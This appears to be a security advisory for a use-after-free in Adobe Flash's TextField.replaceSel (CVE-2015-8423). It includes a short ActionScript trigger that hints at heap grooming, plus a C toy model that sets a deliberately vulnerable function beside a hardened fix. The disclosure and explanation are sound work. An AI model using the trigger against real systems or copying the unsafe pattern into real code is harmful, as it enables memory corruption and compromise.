Adobe Flash TextField.replaceSel - Use-After-Free

Related Vulnerabilities: CVE-2015-8423  
Publish Date: 18 Dec 2015

There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free.

A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceSel({valueOf : func});

// Called while replaceSel is still running, when the argument is coerced to a string
function func(){
        // Fix heap here
        return "text";
}

A sample swf and fla are attached.
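To make the bug class and its mitigation concrete, here is a small C model added for this write-up (it is not Flash Player's code; the MovieClip/TextField structures, the reference count and the callback type are assumptions). The script-supplied string conversion runs in the middle of the operation and removes the parent; the hardened variant holds a reference across the callback and re-checks liveness before writing.

```c
#include <stdlib.h>
#include <string.h>
/* Toy model of the bug class (added here; not Flash's code): replaceSel()
 * converts its argument to a string via a script-supplied callback
 * (toString/valueOf), and that callback can remove the TextField's parent. */
typedef struct MovieClip { int refs; int alive; char text[32]; } MovieClip;
typedef struct TextField { MovieClip *parent; } TextField;
typedef const char *(*to_string_fn)(void *ctx);
/* Display list holds one reference; removeMovieClip() marks dead and drops it. */
static MovieClip *clip_new(void) {
    MovieClip *m = calloc(1, sizeof *m);
    m->refs = 1; m->alive = 1;
    return m;
}
static void clip_ref(MovieClip *m)    { m->refs++; }
static void clip_unref(MovieClip *m)  { if (--m->refs == 0) free(m); }
static void clip_remove(MovieClip *m) { m->alive = 0; clip_unref(m); }
/* Vulnerable shape: a raw parent pointer is cached, then the callback runs. */
int replace_sel_vulnerable(TextField *tf, to_string_fn cb, void *ctx) {
    MovieClip *parent = tf->parent;
    const char *s = cb(ctx);                           /* may free `parent` */
    strncpy(parent->text, s, sizeof parent->text - 1); /* use-after-free */
    return 1;
}
/* Hardened shape: hold a reference across the callback, then re-check liveness. */
int replace_sel_fixed(TextField *tf, to_string_fn cb, void *ctx) {
    MovieClip *parent = tf->parent;
    clip_ref(parent);                 /* allocation now outlives the callback */
    const char *s = cb(ctx);
    int ok = parent->alive;           /* removed by script? then skip the write */
    if (ok) strncpy(parent->text, s, sizeof parent->text - 1);
    clip_unref(parent);
    return ok;
}
/* Callbacks: the PoC-style one removes the parent before returning "text". */
static const char *removing_cb(void *ctx) { clip_remove((MovieClip *)ctx); return "text"; }
static const char *plain_cb(void *ctx)    { (void)ctx; return "text"; }
/* 1 when the hardened path refuses the write after the parent was removed. */
int demo_removed_parent(void) {
    MovieClip *mc = clip_new();
    TextField tf = { mc };
    return replace_sel_fixed(&tf, removing_cb, mc) == 0;   /* mc freed inside */
}
/* 1 when a live parent still receives "text" through the hardened path. */
int demo_live_parent(void) {
    MovieClip *mc = clip_new();
    TextField tf = { mc };
    int ok = replace_sel_fixed(&tf, plain_cb, NULL) && strcmp(mc->text, "text") == 0;
    clip_remove(mc);
    return ok;
}
```

Only the hardened path is exercised by the demo functions; calling replace_sel_vulnerable with removing_cb would perform the same freed-memory write the advisory describes.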

Proof of Concept: